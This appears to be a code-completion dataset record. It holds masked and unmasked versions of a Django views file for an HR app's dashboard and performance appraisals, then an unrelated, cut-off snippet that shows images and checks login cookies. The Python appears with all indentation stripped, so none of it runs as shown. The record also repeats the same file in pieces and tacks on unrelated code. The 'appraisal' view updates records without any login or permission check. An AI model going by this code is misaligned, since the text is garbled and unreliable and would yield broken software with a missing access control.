def get_context_data(self, **kwargs):
context = super(DeletePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
<mask token>
| <mask token>
class ListPerformanceView(ListView):
model = Performance
context_object_name = 'performances'
template_name = 'hrm/performance/performance_list.html'
def get_context_data(self, **kwargs):
context = super(ListPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class UpdatePerformanceView(SuccessMessageMixin, UpdateView):
model = Performance
fields = 'employee', 'start_date', 'finish_date', 'objective'
success_message = 'Successfully! Updated an appraisal'
context_object_name = 'performance'
template_name = 'hrm/performance/performance_form.html'
def get_context_data(self, **kwargs):
context = super(UpdatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DetailPerformanceView(DetailView):
model = Performance
context_object_name = 'performance'
template_name = 'hrm/performance/performance_details.html'
def get_context_data(self, **kwargs):
context = super(DetailPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DeletePerformanceView(SuccessMessageMixin, DeleteView):
model = Performance
success_message = 'Successfully! Deleted an appraisal.'
success_url = reverse_lazy('hrm:perfom_list')
template_name = 'hrm/performance/performance_delete.html'
def get_context_data(self, **kwargs):
context = super(DeletePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
<mask token>
| <mask token>
def index(request):
if not request.session.get('username'):
return HttpResponseRedirect(reverse('accounts:login'))
applied_leaves = ApplyLeave.objects.count()
employees = Employee.objects.count()
positions = Position.objects.count()
departments = Department.objects.count()
user = User.objects.get(username=request.session['username'])
employee = Employee.objects.get(user=user.id)
return render(request, 'hrm/dashboard.html', {'employees': employees,
'positions': positions, 'departments': departments,
'applied_leaves': applied_leaves, 'employee': employee, 'user': user})
<mask token>
class CreatePerformanceView(SuccessMessageMixin, CreateView):
model = Performance
fields = 'employee', 'start_date', 'finish_date', 'objective'
success_message = 'Successfully! Created employee and appraisal...'
template_name = 'hrm/performance/performance_form.html'
def get_context_data(self, **kwargs):
context = super(CreatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class ListPerformanceView(ListView):
model = Performance
context_object_name = 'performances'
template_name = 'hrm/performance/performance_list.html'
def get_context_data(self, **kwargs):
context = super(ListPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class UpdatePerformanceView(SuccessMessageMixin, UpdateView):
model = Performance
fields = 'employee', 'start_date', 'finish_date', 'objective'
success_message = 'Successfully! Updated an appraisal'
context_object_name = 'performance'
template_name = 'hrm/performance/performance_form.html'
def get_context_data(self, **kwargs):
context = super(UpdatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DetailPerformanceView(DetailView):
model = Performance
context_object_name = 'performance'
template_name = 'hrm/performance/performance_details.html'
def get_context_data(self, **kwargs):
context = super(DetailPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DeletePerformanceView(SuccessMessageMixin, DeleteView):
model = Performance
success_message = 'Successfully! Deleted an appraisal.'
success_url = reverse_lazy('hrm:perfom_list')
template_name = 'hrm/performance/performance_delete.html'
def get_context_data(self, **kwargs):
context = super(DeletePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
<mask token>
def show_employee_perfomance_control(request):
check_user_login(request)
employee = Employee.objects.get(user=User.objects.get(username=request.
session['username']).id)
perform = Performance.objects.filter(employee=employee.id)
print(perform)
if perform is None:
return HttpResponseRedirect(reverse('hrm:hrm_index'))
return render(request, 'hrm/performance/employee_performance.html', {
'employee': employee, 'performances': perform})
<mask token>
| from django.shortcuts import render, get_object_or_404
from django.views.generic import ListView, CreateView, UpdateView, DeleteView, DetailView
from accounts.models import Employee
from leave.models import ApplyLeave
from departments.models import Department, Position
from django.contrib.auth.models import User
from hrm.models import Performance
from django.urls import reverse_lazy, reverse
from hrm.forms import PerformanceForm
from django.http import HttpResponseRedirect
from django.contrib.messages.views import SuccessMessageMixin
from django.contrib import messages
from helpers.help import check_user_login
def index(request):
if not request.session.get('username'):
return HttpResponseRedirect(reverse('accounts:login'))
applied_leaves = ApplyLeave.objects.count()
employees = Employee.objects.count()
positions = Position.objects.count()
departments = Department.objects.count()
user = User.objects.get(username=request.session['username'])
employee = Employee.objects.get(user=user.id)
return render(request, 'hrm/dashboard.html', {'employees': employees,
'positions': positions, 'departments': departments,
'applied_leaves': applied_leaves, 'employee': employee, 'user': user})
<mask token>
class CreatePerformanceView(SuccessMessageMixin, CreateView):
model = Performance
fields = 'employee', 'start_date', 'finish_date', 'objective'
success_message = 'Successfully! Created employee and appraisal...'
template_name = 'hrm/performance/performance_form.html'
def get_context_data(self, **kwargs):
context = super(CreatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class ListPerformanceView(ListView):
model = Performance
context_object_name = 'performances'
template_name = 'hrm/performance/performance_list.html'
def get_context_data(self, **kwargs):
context = super(ListPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class UpdatePerformanceView(SuccessMessageMixin, UpdateView):
model = Performance
fields = 'employee', 'start_date', 'finish_date', 'objective'
success_message = 'Successfully! Updated an appraisal'
context_object_name = 'performance'
template_name = 'hrm/performance/performance_form.html'
def get_context_data(self, **kwargs):
context = super(UpdatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DetailPerformanceView(DetailView):
model = Performance
context_object_name = 'performance'
template_name = 'hrm/performance/performance_details.html'
def get_context_data(self, **kwargs):
context = super(DetailPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DeletePerformanceView(SuccessMessageMixin, DeleteView):
model = Performance
success_message = 'Successfully! Deleted an appraisal.'
success_url = reverse_lazy('hrm:perfom_list')
template_name = 'hrm/performance/performance_delete.html'
def get_context_data(self, **kwargs):
context = super(DeletePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
<mask token>
def show_employee_perfomance_control(request):
check_user_login(request)
employee = Employee.objects.get(user=User.objects.get(username=request.
session['username']).id)
perform = Performance.objects.filter(employee=employee.id)
print(perform)
if perform is None:
return HttpResponseRedirect(reverse('hrm:hrm_index'))
return render(request, 'hrm/performance/employee_performance.html', {
'employee': employee, 'performances': perform})
<mask token>
def perfomance_notes(request, pk):
form = PerformanceForm(request.POST or None, instance=get_object_or_404
(Performance, pk=pk))
employee = Employee.objects.get(user=User.objects.get(username=request.
session['username']).id)
if request.method == 'POST':
if form.is_valid():
form.save()
messages.success(request,
'Successfully! Added notes on what you have done.')
return HttpResponseRedirect(reverse('hrm:perfom_employee'))
return render(request, 'hrm/performance/performance_notes.html', {
'form': form, 'employee': employee})
def appraisal(request, pk):
perform = Performance.objects.get(id=pk)
perform.status = 1
perform.save()
messages.success(request, 'Successfully! Appraised employee work....')
return HttpResponseRedirect(reverse('hrm:perfom_list'))
| from django.shortcuts import render, get_object_or_404
from django.views.generic import ListView, CreateView, UpdateView, DeleteView, DetailView
from accounts.models import Employee
from leave.models import ApplyLeave
from departments.models import Department, Position
from django.contrib.auth.models import User
from hrm.models import Performance
from django.urls import reverse_lazy, reverse
from hrm.forms import PerformanceForm
from django.http import HttpResponseRedirect
from django.contrib.messages.views import SuccessMessageMixin
from django.contrib import messages
from helpers.help import check_user_login
# Create your views here.
def index(request):
if not request.session.get('username'):
return HttpResponseRedirect(reverse("accounts:login"))
applied_leaves = ApplyLeave.objects.count()
employees = Employee.objects.count()
positions = Position.objects.count()
departments = Department.objects.count()
user = User.objects.get(username = request.session['username'])
employee = Employee.objects.get(user = user.id)
return render(request, "hrm/dashboard.html",
{'employees': employees, 'positions': positions, 'departments': departments,
'applied_leaves': applied_leaves, "employee": employee, "user":user})
'''
Perfomance Control
'''
class CreatePerformanceView(SuccessMessageMixin, CreateView):
model = Performance
fields = ('employee', 'start_date', 'finish_date', 'objective')
success_message = "Successfully! Created employee and appraisal..."
template_name = "hrm/performance/performance_form.html"
def get_context_data(self, **kwargs):
context = super(CreatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user = self.request.user.id)
return context
class ListPerformanceView(ListView):
model = Performance
context_object_name = "performances"
template_name = "hrm/performance/performance_list.html"
def get_context_data(self, **kwargs):
context = super(ListPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user = self.request.user.id)
return context
class UpdatePerformanceView(SuccessMessageMixin, UpdateView):
model = Performance
fields = ('employee', 'start_date', 'finish_date', 'objective')
success_message = "Successfully! Updated an appraisal"
context_object_name = "performance"
template_name = "hrm/performance/performance_form.html"
def get_context_data(self, **kwargs):
context = super(UpdatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user = self.request.user.id)
return context
class DetailPerformanceView(DetailView):
model = Performance
context_object_name = "performance"
template_name = "hrm/performance/performance_details.html"
def get_context_data(self, **kwargs):
context = super(DetailPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user = self.request.user.id)
return context
class DeletePerformanceView(SuccessMessageMixin, DeleteView):
model = Performance
success_message = "Successfully! Deleted an appraisal."
success_url = reverse_lazy("hrm:perfom_list")
template_name = "hrm/performance/performance_delete.html"
def get_context_data(self, **kwargs):
context = super(DeletePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user = self.request.user.id)
return context
'''
Showing an employees perfomance control
'''
def show_employee_perfomance_control(request):
check_user_login(request)
employee = Employee.objects.get(user= User.objects.get(username = request.session['username']).id)
perform = Performance.objects.filter(employee = employee.id)
print(perform)
if perform is None:
return HttpResponseRedirect(reverse("hrm:hrm_index"))
return render(request, "hrm/performance/employee_performance.html", {'employee': employee, 'performances': perform})
'''
Employee Provide Notes for his perfomance
'''
def perfomance_notes(request, pk):
form = PerformanceForm(request.POST or None,instance = get_object_or_404(Performance, pk=pk))
employee = Employee.objects.get(user= User.objects.get(username = request.session['username']).id)
if request.method == "POST":
if form.is_valid():
form.save()
messages.success(request, "Successfully! Added notes on what you have done.")
return HttpResponseRedirect(reverse('hrm:perfom_employee'))
return render(request, "hrm/performance/performance_notes.html", {'form': form, 'employee': employee})
def appraisal(request, pk):
perform = Performance.objects.get(id = pk)
perform.status = 1
perform.save()
messages.success(request, "Successfully! Appraised employee work....")
return HttpResponseRedirect(reverse('hrm:perfom_list'))
| [
7,
12,
17,
20,
21
] |
1,633 | 4e50a7a757bacb04dc8f292bdaafb03c86042e6c | <mask token>
| <mask token>
class TestCadastro(BaseTest):
<mask token>
| <mask token>
class TestCadastro(BaseTest):
def test_cadastro_com_sucesso(self):
self.campoDeTreinamento = CampoDeTreinamentoPage(self.driver)
self.campoDeTreinamento.fill_name('Everton')
self.campoDeTreinamento.fill_sobrenome('Araujo')
self.campoDeTreinamento.select_sexo_masculino()
self.campoDeTreinamento.cadastra()
time.sleep(3)
| import time
from tests.test_base import BaseTest
from pages.campo_de_treinamento_page import CampoDeTreinamentoPage
class TestCadastro(BaseTest):
def test_cadastro_com_sucesso(self):
self.campoDeTreinamento = CampoDeTreinamentoPage(self.driver)
self.campoDeTreinamento.fill_name('Everton')
self.campoDeTreinamento.fill_sobrenome('Araujo')
self.campoDeTreinamento.select_sexo_masculino()
self.campoDeTreinamento.cadastra()
time.sleep(3)
| import time
from tests.test_base import BaseTest
from pages.campo_de_treinamento_page import CampoDeTreinamentoPage
class TestCadastro(BaseTest):
def test_cadastro_com_sucesso(self):
self.campoDeTreinamento = CampoDeTreinamentoPage(self.driver)
self.campoDeTreinamento.fill_name("Everton")
self.campoDeTreinamento.fill_sobrenome("Araujo")
self.campoDeTreinamento.select_sexo_masculino()
self.campoDeTreinamento.cadastra()
time.sleep(3)
| [
0,
1,
2,
3,
4
] |
1,634 | 941a93c66a5131712f337ad055bbf2a93e6ec10d | <mask token>
| <mask token>
def bd_finder(qw, region, page_num):
page_size = '20'
bd_ak = 'wkEmrv7B1l0KPpi30F1G2VMx10xEdeol'
bd_url = 'http://api.map.baidu.com/place/v2/search?'
furl = (bd_url + 'q=' + qw + '&page_size=' + page_size + '&page_num=' +
page_num + '®ion=' + region + '&output=json&ak=' + bd_ak)
page = urllib2.urlopen(furl)
html = page.read()
data = json.loads(html)
w = Workbook()
ws = w.add_sheet('test')
str1 = '医院名称'
str2 = '医院地址'
str3 = '电话号码'
str4 = '维度'
str5 = '经度'
ws.write(0, 0, str1.decode('utf-8'))
ws.write(0, 1, str2.decode('utf-8'))
ws.write(0, 2, str3.decode('utf-8'))
ws.write(0, 3, str4.decode('utf-8'))
ws.write(0, 4, str5.decode('utf-8'))
count = 0
for i in data['results']:
count += 1
ws.write(count, 0, '%s' % i.get('name'))
ws.write(count, 1, '%s' % i.get('address'))
ws.write(count, 2, '%s' % i.get('telephone'))
ws.write(count, 3, '%s' % i.get('location')['lat'])
ws.write(count, 4, '%s' % i.get('location')['lng'])
w.save('test.xls')
<mask token>
| <mask token>
def bd_finder(qw, region, page_num):
page_size = '20'
bd_ak = 'wkEmrv7B1l0KPpi30F1G2VMx10xEdeol'
bd_url = 'http://api.map.baidu.com/place/v2/search?'
furl = (bd_url + 'q=' + qw + '&page_size=' + page_size + '&page_num=' +
page_num + '®ion=' + region + '&output=json&ak=' + bd_ak)
page = urllib2.urlopen(furl)
html = page.read()
data = json.loads(html)
w = Workbook()
ws = w.add_sheet('test')
str1 = '医院名称'
str2 = '医院地址'
str3 = '电话号码'
str4 = '维度'
str5 = '经度'
ws.write(0, 0, str1.decode('utf-8'))
ws.write(0, 1, str2.decode('utf-8'))
ws.write(0, 2, str3.decode('utf-8'))
ws.write(0, 3, str4.decode('utf-8'))
ws.write(0, 4, str5.decode('utf-8'))
count = 0
for i in data['results']:
count += 1
ws.write(count, 0, '%s' % i.get('name'))
ws.write(count, 1, '%s' % i.get('address'))
ws.write(count, 2, '%s' % i.get('telephone'))
ws.write(count, 3, '%s' % i.get('location')['lat'])
ws.write(count, 4, '%s' % i.get('location')['lng'])
w.save('test.xls')
for k in xrange(0, 10):
bd_finder('医院', '武汉', str(k))
| import urllib2
import json
import sys
from pyExcelerator import *
def bd_finder(qw, region, page_num):
page_size = '20'
bd_ak = 'wkEmrv7B1l0KPpi30F1G2VMx10xEdeol'
bd_url = 'http://api.map.baidu.com/place/v2/search?'
furl = (bd_url + 'q=' + qw + '&page_size=' + page_size + '&page_num=' +
page_num + '®ion=' + region + '&output=json&ak=' + bd_ak)
page = urllib2.urlopen(furl)
html = page.read()
data = json.loads(html)
w = Workbook()
ws = w.add_sheet('test')
str1 = '医院名称'
str2 = '医院地址'
str3 = '电话号码'
str4 = '维度'
str5 = '经度'
ws.write(0, 0, str1.decode('utf-8'))
ws.write(0, 1, str2.decode('utf-8'))
ws.write(0, 2, str3.decode('utf-8'))
ws.write(0, 3, str4.decode('utf-8'))
ws.write(0, 4, str5.decode('utf-8'))
count = 0
for i in data['results']:
count += 1
ws.write(count, 0, '%s' % i.get('name'))
ws.write(count, 1, '%s' % i.get('address'))
ws.write(count, 2, '%s' % i.get('telephone'))
ws.write(count, 3, '%s' % i.get('location')['lat'])
ws.write(count, 4, '%s' % i.get('location')['lng'])
w.save('test.xls')
for k in xrange(0, 10):
bd_finder('医院', '武汉', str(k))
| #!/usr/bin/env python
#coding=utf-8
#author:maohan
#date:20160706
#decription:通过百度api获取相关信息,并保存为xls格式
#ver:1.0
import urllib2
import json
import sys
from pyExcelerator import *
def bd_finder(qw,region,page_num):
page_size='20'
bd_ak='wkEmrv7B1l0KPpi30F1G2VMx10xEdeol'
bd_url='http://api.map.baidu.com/place/v2/search?'
furl=bd_url+'q='+qw+'&page_size='+page_size+'&page_num='+page_num+'®ion='+region+'&output=json&ak='+bd_ak
page = urllib2.urlopen(furl)
html=page.read()
data=json.loads(html)
w=Workbook()
ws=w.add_sheet('test')
str1='医院名称'
str2='医院地址'
str3='电话号码'
str4='维度'
str5='经度'
ws.write(0,0,str1.decode('utf-8'))
ws.write(0,1,str2.decode('utf-8'))
ws.write(0,2,str3.decode('utf-8'))
ws.write(0,3,str4.decode('utf-8'))
ws.write(0,4,str5.decode('utf-8'))
# print type(data['results'])
# print len(data['results'])
count=0
for i in data['results']:
# print("名称:%-35s") %(i.get('name'))
# print("-------地址:%-35s") %(i.get('address'))
# print("-------电话:%-35s") %(i.get('telephone'))
# print("-------定位:(维度:%-10s)(经度:%-10s)") %(i.get('location')['lat'],i.get('location')['lng'])
# print (format("","100"))
count+=1
ws.write(count,0,'%s' %(i.get('name')))
ws.write(count,1,'%s' %(i.get('address')))
ws.write(count,2,'%s' %(i.get('telephone')))
ws.write(count,3,'%s' %(i.get('location')['lat']))
ws.write(count,4,'%s' %(i.get('location')['lng']))
w.save('test.xls')
for k in xrange(0,10):
bd_finder('医院','武汉',str(k))
| [
0,
1,
2,
3,
4
] |
1,635 | 5923a12378225fb6389e7e0275af6d4aa476fe87 | <mask token>
| <mask token>
def generate(root: Dict):
relations: List[Dict] = []
subj = DPHelper.get_subject(root)
obj = DPHelper.get_object(root)
if subj is not None and DPHelper.is_proper_noun(subj
) and obj is not None and DPHelper.is_proper_noun(obj):
if DPHelper.is_proper_noun(subj) and DPHelper.is_proper_noun(obj):
logging.log(INFO,
'============ Rooted NNP SUBJECT and NNP OBJECT =============')
subjs = get_all_nouns(subj, proper_noun=True)
objs = [get_noun_phrase(obj, proper_noun=True)]
aux_relations = sub_obj_vbroot(root)
relations = relations + create_relations(subjs, aux_relations, objs
)
open_comp: List[Dict] = DPHelper.get_child_type(root, Relations
.OPEN_CLAUSAL_COMPLEMENT)
comp: List[Dict] = DPHelper.get_child_type(root, Relations.
CLAUSAL_COMPLEMENT)
if open_comp:
subjs = [get_noun_phrase(obj, proper_noun=True)]
objs, xcomp_relations = x_comp(open_comp[0])
relations = relations + create_relations(subjs,
xcomp_relations, objs)
elif subj is not None and DPHelper.is_proper_noun(subj):
subjs = get_all_nouns(subj, proper_noun=True)
appos_rels, appos_objs = [], []
appos_rel_objs = []
for appos in DPHelper.get_child_type(subj, Relations.APPOSITION):
a_objs, a_relations = direct_appositional_relations(appos)
relations += create_nested_relations(subjs, a_relations, a_objs)
if DPHelper.get_child_type(root, Relations.CLAUSAL_COMPLEMENT):
pass
if DPHelper.is_proper_noun(subj) and subj['link'
] == Relations.PASSIVE_NOM_SUBJECT:
logging.log(INFO,
'============= NNP PASSIVE SUBJECT ===============')
objs, aux_relations, appos = subjpass(root)
for appos_instance in appos:
relations = relations + create_relations(subjs,
appos_instance['relation'], appos_instance['obj'])
relations = relations + create_relations(subjs, aux_relations, objs
)
elif DPHelper.is_noun(root):
logging.log(INFO,
'============= NNP SUBJECT with NOUN ROOT ===============')
objs, aux_relations = nnroot_subj(root)
relations = relations + create_relations(subjs, aux_relations, objs
)
elif DPHelper.is_verb(root) and obj is not None:
logging.log(INFO,
'============= NNP SUBJECT with VERB ROOT (NON-NNP DOBJ present) ==============='
)
objs, aux_relations = vbroot_subj_xobj(root)
relations = relations + create_relations(subjs, aux_relations, objs
)
elif DPHelper.is_verb(root):
logging.log(INFO,
'============= NNP SUBJECT with VERB ROOT ===============')
objs, aux_relations = vbroot_subj(root)
relations = relations + create_nested_relations(subjs,
aux_relations, objs)
elif DPHelper.is_adjective(root):
logging.log(INFO,
'============= NNP SUBJECT with ADJ ROOT ===============')
objs, aux_relations = vbroot_subj(root)
relations = relations + create_nested_relations(subjs,
aux_relations, objs)
else:
logging.log(INFO,
'============= NNP SUBJECT with UNKNOWN STRUCTURE ==============='
)
else:
logging.log(INFO,
'============== NOUN ROOT - No Direct SUBJ and OBJ ================'
)
if subj is not None:
if subj['link'] == Relations.PASSIVE_NOM_SUBJECT:
logging.log(INFO,
'============= NESTED POSSESSIVE OF PASSIVE SUBJECT ==============='
)
subjs = subjpass_poss(subj)
if DPHelper.has_rc_modifier(root):
logging.log(INFO,
'============= RELATIVE CLAUSE MODIFIER PRESENT ==============='
)
if DPHelper.is_proper_noun(root):
subj, relations, objs = nnproot(root)
all_rel_tuples = []
for relation in relations:
rel_tuples = [(sub, relation['relation'], obj) for sub in relation[
'subjs'] for obj in relation['objs']]
all_rel_tuples += rel_tuples
return all_rel_tuples
| import logging
from logging import INFO
from typing import Dict, List
from .constants import Relations, POS
from .evaluator import *
from .general import DPHelper
from .general import *
from .utils import *
def generate(root: Dict):
relations: List[Dict] = []
subj = DPHelper.get_subject(root)
obj = DPHelper.get_object(root)
if subj is not None and DPHelper.is_proper_noun(subj
) and obj is not None and DPHelper.is_proper_noun(obj):
if DPHelper.is_proper_noun(subj) and DPHelper.is_proper_noun(obj):
logging.log(INFO,
'============ Rooted NNP SUBJECT and NNP OBJECT =============')
subjs = get_all_nouns(subj, proper_noun=True)
objs = [get_noun_phrase(obj, proper_noun=True)]
aux_relations = sub_obj_vbroot(root)
relations = relations + create_relations(subjs, aux_relations, objs
)
open_comp: List[Dict] = DPHelper.get_child_type(root, Relations
.OPEN_CLAUSAL_COMPLEMENT)
comp: List[Dict] = DPHelper.get_child_type(root, Relations.
CLAUSAL_COMPLEMENT)
if open_comp:
subjs = [get_noun_phrase(obj, proper_noun=True)]
objs, xcomp_relations = x_comp(open_comp[0])
relations = relations + create_relations(subjs,
xcomp_relations, objs)
elif subj is not None and DPHelper.is_proper_noun(subj):
subjs = get_all_nouns(subj, proper_noun=True)
appos_rels, appos_objs = [], []
appos_rel_objs = []
for appos in DPHelper.get_child_type(subj, Relations.APPOSITION):
a_objs, a_relations = direct_appositional_relations(appos)
relations += create_nested_relations(subjs, a_relations, a_objs)
if DPHelper.get_child_type(root, Relations.CLAUSAL_COMPLEMENT):
pass
if DPHelper.is_proper_noun(subj) and subj['link'
] == Relations.PASSIVE_NOM_SUBJECT:
logging.log(INFO,
'============= NNP PASSIVE SUBJECT ===============')
objs, aux_relations, appos = subjpass(root)
for appos_instance in appos:
relations = relations + create_relations(subjs,
appos_instance['relation'], appos_instance['obj'])
relations = relations + create_relations(subjs, aux_relations, objs
)
elif DPHelper.is_noun(root):
logging.log(INFO,
'============= NNP SUBJECT with NOUN ROOT ===============')
objs, aux_relations = nnroot_subj(root)
relations = relations + create_relations(subjs, aux_relations, objs
)
elif DPHelper.is_verb(root) and obj is not None:
logging.log(INFO,
'============= NNP SUBJECT with VERB ROOT (NON-NNP DOBJ present) ==============='
)
objs, aux_relations = vbroot_subj_xobj(root)
relations = relations + create_relations(subjs, aux_relations, objs
)
elif DPHelper.is_verb(root):
logging.log(INFO,
'============= NNP SUBJECT with VERB ROOT ===============')
objs, aux_relations = vbroot_subj(root)
relations = relations + create_nested_relations(subjs,
aux_relations, objs)
elif DPHelper.is_adjective(root):
logging.log(INFO,
'============= NNP SUBJECT with ADJ ROOT ===============')
objs, aux_relations = vbroot_subj(root)
relations = relations + create_nested_relations(subjs,
aux_relations, objs)
else:
logging.log(INFO,
'============= NNP SUBJECT with UNKNOWN STRUCTURE ==============='
)
else:
logging.log(INFO,
'============== NOUN ROOT - No Direct SUBJ and OBJ ================'
)
if subj is not None:
if subj['link'] == Relations.PASSIVE_NOM_SUBJECT:
logging.log(INFO,
'============= NESTED POSSESSIVE OF PASSIVE SUBJECT ==============='
)
subjs = subjpass_poss(subj)
if DPHelper.has_rc_modifier(root):
logging.log(INFO,
'============= RELATIVE CLAUSE MODIFIER PRESENT ==============='
)
if DPHelper.is_proper_noun(root):
subj, relations, objs = nnproot(root)
all_rel_tuples = []
for relation in relations:
rel_tuples = [(sub, relation['relation'], obj) for sub in relation[
'subjs'] for obj in relation['objs']]
all_rel_tuples += rel_tuples
return all_rel_tuples
| import logging
from logging import INFO
from typing import Dict, List
from .constants import Relations, POS
from .evaluator import *
from .general import DPHelper
from .general import *
from .utils import *
# ========================================= DRIVER =================================================
def generate(root: Dict):
# {"relation": <>, "subjs": [<>], "objs": [<>]}
relations: List[Dict] = []
# Is this applicable only to root?
subj = DPHelper.get_subject(root)
obj = DPHelper.get_object(root)
if subj is not None and DPHelper.is_proper_noun(subj) and \
obj is not None and DPHelper.is_proper_noun(obj):
if DPHelper.is_proper_noun(subj) and DPHelper.is_proper_noun(obj):
logging.log(INFO, "============ Rooted NNP SUBJECT and NNP OBJECT =============")
subjs = get_all_nouns(subj, proper_noun=True)
objs = [get_noun_phrase(obj, proper_noun=True)]
aux_relations = sub_obj_vbroot(root) # Relations between subject and object
relations = relations + create_relations(subjs, aux_relations, objs)
# Relations within clausal complements
open_comp: List[Dict] = DPHelper.get_child_type(root, Relations.OPEN_CLAUSAL_COMPLEMENT)
comp: List[Dict] = DPHelper.get_child_type(root, Relations.CLAUSAL_COMPLEMENT)
if open_comp: # Assume for now open_comps all relate to object
subjs = [get_noun_phrase(obj, proper_noun=True)]
objs, xcomp_relations = x_comp(open_comp[0]) # TODO Can there be multiple xcomps?
relations = relations + create_relations(subjs, xcomp_relations, objs)
elif subj is not None and DPHelper.is_proper_noun(subj):
subjs = get_all_nouns(subj, proper_noun=True)
appos_rels, appos_objs = [], []
# Find direct appositional relations within NSUBJ block
appos_rel_objs = []
for appos in DPHelper.get_child_type(subj, Relations.APPOSITION):
a_objs, a_relations = direct_appositional_relations(appos)
relations += create_nested_relations(subjs, a_relations, a_objs)
# TODO Check for clausal complement for Subj (INDEPENDENT)
if DPHelper.get_child_type(root, Relations.CLAUSAL_COMPLEMENT):
pass
# Passive subject, look into preposition for predicate object with possessive
if DPHelper.is_proper_noun(subj) and subj["link"] == Relations.PASSIVE_NOM_SUBJECT:
logging.log(INFO, "============= NNP PASSIVE SUBJECT ===============")
objs, aux_relations, appos = subjpass(root)
for appos_instance in appos:
relations = relations + create_relations(subjs, appos_instance["relation"], appos_instance["obj"])
relations = relations + create_relations(subjs, aux_relations, objs)
# Possible case where root is noun and hence subject is not labeled passive but relation still exists
elif DPHelper.is_noun(root):
logging.log(INFO, "============= NNP SUBJECT with NOUN ROOT ===============")
objs, aux_relations = nnroot_subj(root)
relations = relations + create_relations(subjs, aux_relations, objs)
# Usually the case that the direct obj being non-NNP represents relation
elif DPHelper.is_verb(root) and obj is not None:
logging.log(INFO, "============= NNP SUBJECT with VERB ROOT (NON-NNP DOBJ present) ===============")
objs, aux_relations = vbroot_subj_xobj(root)
relations = relations + create_relations(subjs, aux_relations, objs)
# Root verb without concrete noun form but valid relation (E.g. lives, resides) TODO Do we require `in/from etc.` for preposition?
elif DPHelper.is_verb(root):
logging.log(INFO, "============= NNP SUBJECT with VERB ROOT ===============")
objs, aux_relations = vbroot_subj(root)
relations = relations + create_nested_relations(subjs, aux_relations, objs)
elif DPHelper.is_adjective(root):
logging.log(INFO, "============= NNP SUBJECT with ADJ ROOT ===============")
objs, aux_relations = vbroot_subj(root) # FIXME We assume this is similar to verb root for now
relations = relations + create_nested_relations(subjs, aux_relations, objs)
else:
logging.log(INFO, "============= NNP SUBJECT with UNKNOWN STRUCTURE ===============")
else:
logging.log(INFO, "============== NOUN ROOT - No Direct SUBJ and OBJ ================")
if subj is not None: # Mostly likely noun with possessive or nested
if (subj["link"] == Relations.PASSIVE_NOM_SUBJECT): # Necessarily assume this since noun subj is possessive, else should Corefer
logging.log(INFO, "============= NESTED POSSESSIVE OF PASSIVE SUBJECT ===============")
subjs = subjpass_poss(subj)
if DPHelper.has_rc_modifier(root): # NNP still might be present in rc modifier
logging.log(INFO, "============= RELATIVE CLAUSE MODIFIER PRESENT ===============")
if DPHelper.is_proper_noun(root):
subj, relations, objs = nnproot(root)
all_rel_tuples = []
for relation in relations:
rel_tuples = [(sub, relation['relation'], obj) for sub in relation['subjs'] for obj in relation['objs']]
all_rel_tuples += rel_tuples
return all_rel_tuples
| null | [
0,
1,
2,
3
] |
1,636 | 75990147e4a3dae1b590729ed659e2ddcbfb295d | ## More Review + More Linked Lists ##
##Given a pointer to the head node of a linked list whose data elements are in non-decreasing order, you must delete any duplicate nodes and print the updated list.
##Code handling I/O is provided in the editor. Complete the removeDuplicates(Node) function.
##Note: The head pointer may be null, indicating that the list is empty. Be sure to reset your next pointer when performing deletions to avoid breaking the list.
##Input Format
##The first line contains N, the number of nodes to be inserted.
##The N subsequent lines each contain an integer describing the data for a node being inserted at the list's tail;
##the lines of data will always be in non-decreasing order.
##Output Format
##Print the data for your list of ascending nodes as a single line of space-separated integers.
##Sample Input
##6
##1
##2
##2
##3
##3
##4
##Sample Output
##1 2 3 4
##Explanation
##N = 6, and our non-decreasing list is {1,2,2,3,3,4}. The data values 2 and 3 each have a duplicate,
##so we remove the two duplicate nodes and print our updated (ascending) list
class Node:
def __init__(self,data):
self.data = data
self.next = None
class Solution:
def insert(self,head,data):
p = Node(data)
if head==None:
head=p
elif head.next==None:
head.next=p
else:
start=head
while(start.next!=None):
start=start.next
start.next=p
return head
def display(self,head):
current = head
while current:
print current.data,
current = current.next
def removeDuplicates(self,head): ########
if head==None or head.next ==None: return head
tmp = head;
while tmp.next!=None:
if tmp.data==tmp.next.data: tmp.next=tmp.next.next;
else: tmp=tmp.next;
return head
mylist= Solution()
T=int(input())
head=None
for i in range(T):
data=int(input())
head=mylist.insert(head,data)
head=mylist.removeDuplicates(head)
mylist.display(head);
| null | null | null | null | [
0
] |
1,637 | c268c61e47698d07b7c1461970dc47242af55777 | <mask token>
class showpng(Thread):
def __init__(self, data):
Thread.__init__(self)
self.data = data
def run(self):
img = Image.open(BytesIO(self.data))
img.show()
def islogin(session):
try:
session.cookies.load(ignore_discard=True)
except Exception:
pass
